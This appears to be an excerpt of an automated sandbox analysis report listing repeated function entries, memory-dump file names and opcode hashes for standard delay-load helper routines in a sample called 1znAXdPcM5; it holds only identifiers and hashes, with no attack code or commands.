                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 03f95a8bf5155aee538a2dd5b3f45b9088344905dc25dc2b7b06620e93fff0ea
                                                                                                                    • Instruction ID: 3166415e5bf305e43e8847c8dcd9761c06a6f19b11ae6be6359123c916693b17
                                                                                                                    • Opcode Fuzzy Hash: 03f95a8bf5155aee538a2dd5b3f45b9088344905dc25dc2b7b06620e93fff0ea
                                                                                                                    • Instruction Fuzzy Hash: D4B012F1269182BC365CD2461C0BD3B0D4DF0C1B10330453EF845C50C0DC407CC55431
                                                                                                                    Function 0059E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 6949e880c0fb4e637a8452c85f00505a59fcc7b81d161292458c1775a621e136
                                                                                                                    • Instruction ID: f01aa1e6d5b54c6cc7ebd23c09fc406dc12cc18cba0f5ac5fe129b089896816e
                                                                                                                    • Opcode Fuzzy Hash: 6949e880c0fb4e637a8452c85f00505a59fcc7b81d161292458c1775a621e136
                                                                                                                    • Instruction Fuzzy Hash: BCB012E1269082AC361CD1461C0BD370D4DF0C2B10330843EFC45C50C0DC40BC815431
                                                                                                                    Function 0059E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 55e4d17e85203d8cfd92b175675860fce66452a8f7741a2f90924dcd999095f3
                                                                                                                    • Instruction ID: 6859edcb12d047b85710ac2623d3ba8fcecf889edcb2d0ab7b276e393b991a2b
                                                                                                                    • Opcode Fuzzy Hash: 55e4d17e85203d8cfd92b175675860fce66452a8f7741a2f90924dcd999095f3
                                                                                                                    • Instruction Fuzzy Hash: 36B012E1268042AC361CD1561C0BD370D8CF0C2B10330843EFC45C50C0DC40BC816431
                                                                                                                    Function 0059E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 6c4c7502609cbe9a28d614f045576b4ae4399cf7b50c0d21366d8272f743c299
                                                                                                                    • Instruction ID: f7494278825012ec44214f5b99d8f433d8537b6871d4a187124a3c98db21c256
                                                                                                                    • Opcode Fuzzy Hash: 6c4c7502609cbe9a28d614f045576b4ae4399cf7b50c0d21366d8272f743c299
                                                                                                                    • Instruction Fuzzy Hash: BDB012E1279082AC361CD1461C0BD370D8DF4C1B10330447EF846C50C0DC407C815431
                                                                                                                    Function 0059E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 4cbc9d692e9b0558c396625652ae62b4b08836e72ee01ea14e6caf2a1d03e6a7
                                                                                                                    • Instruction ID: c2ad965bb31cc818f00137cb52b2d062f798194d8e21f6cc2aaf5927d697e880
                                                                                                                    • Opcode Fuzzy Hash: 4cbc9d692e9b0558c396625652ae62b4b08836e72ee01ea14e6caf2a1d03e6a7
                                                                                                                    • Instruction Fuzzy Hash: 4EB092B1268042AC26189146180BD360D4CE1C2B10320842EF845C50809840A9815431
                                                                                                                    Function 0059E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 2e40a94ef21ae6c9e752b145de3c54c4a3e7538f143d83ffff30591d2d8a09c6
                                                                                                                    • Instruction ID: c87c527c52a9454b1fa890feaa2fdf94c9754cd9bd85b7843dc84c929e396ed6
                                                                                                                    • Opcode Fuzzy Hash: 2e40a94ef21ae6c9e752b145de3c54c4a3e7538f143d83ffff30591d2d8a09c6
                                                                                                                    • Instruction Fuzzy Hash: 6BB012E1268042BC361CD2461D0BD370D4CF0C1B10330843EF885C51C0DC507D8A5431
                                                                                                                    Function 0059E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 534abd32a1c903c66e345fd1012ad6b2b1a39ab71146982bea7e80532c417c7e
                                                                                                                    • Instruction ID: 79b4905a94d4630322679cbe1943d32f3ed1d6eede4d4b0eb8a515da5a57bbe5
                                                                                                                    • Opcode Fuzzy Hash: 534abd32a1c903c66e345fd1012ad6b2b1a39ab71146982bea7e80532c417c7e
                                                                                                                    • Instruction Fuzzy Hash: 3FB012E1368182BC365CD2462C0BD370D4CF0C1B10330853EF885C51C0DC407CC55431
                                                                                                                    Function 0059E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: c2ef24bd0235a93515bb7013093da71c85ad8679596810f81cd9652d7b6f21ed
                                                                                                                    • Instruction ID: 89620ffeb9b0c98cdd09d02f7d6ff9d856d99592ad3770da8002a3b71ff70fb5
                                                                                                                    • Opcode Fuzzy Hash: c2ef24bd0235a93515bb7013093da71c85ad8679596810f81cd9652d7b6f21ed
                                                                                                                    • Instruction Fuzzy Hash: 52B012F1268042AC361CD1471C0BD370D4CF1C1F10330447EF845C50C0DC407D815431
                                                                                                                    Function 0059E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 32833253e090f5e36d2a0a00c3a6c77bab39350a0076dc4beeaaabf712c62b9f
                                                                                                                    • Instruction ID: 94a390fc80209ee9a59d2c2721d11f8c6de5742aa08fd4ad9f1eac7b9c99e0c9
                                                                                                                    • Opcode Fuzzy Hash: 32833253e090f5e36d2a0a00c3a6c77bab39350a0076dc4beeaaabf712c62b9f
                                                                                                                    • Instruction Fuzzy Hash: 2DB012F1268042AC361CD1461D0BD370D4DF1C1F10330443EF845C50C0DC407E825431
                                                                                                                    Function 0059E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: edf2c9d012350c2daf5f47e60b248c5e73c570d9c2c1d0bd1660ae302a50fe73
                                                                                                                    • Instruction ID: 7bb798e2a82f6baa523f6e5d00258f2ab45fc8c7a9e321a33164febe5a50b2de
                                                                                                                    • Opcode Fuzzy Hash: edf2c9d012350c2daf5f47e60b248c5e73c570d9c2c1d0bd1660ae302a50fe73
                                                                                                                    • Instruction Fuzzy Hash: E0B092B1268142AC26589146180BD360D4CE1C1B10320452EF845C5080984069815431
                                                                                                                    Function 0059EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059EAF9
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: 3Ro
                                                                                                                    • API String ID: 1269201914-1492261280
                                                                                                                    • Opcode ID: a7cc77057a2b2e5cc9956201d8c44d6b6d4ffa68d1c63f91c729a115e4697dfa
                                                                                                                    • Instruction ID: 17f0455a78e96fd3559ff41f99c2376d25b100e2a7ccba60467e0c170d406681
                                                                                                                    • Opcode Fuzzy Hash: a7cc77057a2b2e5cc9956201d8c44d6b6d4ffa68d1c63f91c729a115e4697dfa
                                                                                                                    • Instruction Fuzzy Hash: 85B012C62AA0837C3A08E2451D0FC370F0CF0D0BA0330882EF440C4091EC801C020431
                                                                                                                    Function 0059E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 828c53c3d00168c0a0a8d65b5b9df16bd3e1eabed3a0c37474a6278d048388e5
                                                                                                                    • Instruction ID: d0d7553746b33430ae1eb716166effe7bef3c8bf8de211422f8ae783cab714e3
                                                                                                                    • Opcode Fuzzy Hash: 828c53c3d00168c0a0a8d65b5b9df16bd3e1eabed3a0c37474a6278d048388e5
                                                                                                                    • Instruction Fuzzy Hash: 2CB012F1268042EC361CD1461D0BD370DCCF0C1B10330443EF845C50C0DC407D826431
                                                                                                                    Function 0059E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<Y
                                                                                                                    • API String ID: 1269201914-326072144
                                                                                                                    • Opcode ID: faf532b233d05cc83b6f89cd660b917cf597526143d1e5a89a9e636aef5fabec
                                                                                                                    • Instruction ID: e3f5a90c9e674def346372e422a830fac377bb19efe375a3dcfcc3a2a73efccd
                                                                                                                    • Opcode Fuzzy Hash: faf532b233d05cc83b6f89cd660b917cf597526143d1e5a89a9e636aef5fabec
                                                                                                                    • Instruction Fuzzy Hash: 71B092922681417C2608E1495D0FD7A0E48E0C1B10320462AF444C1080B8405C450435
                                                                                                                    Function 0059E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
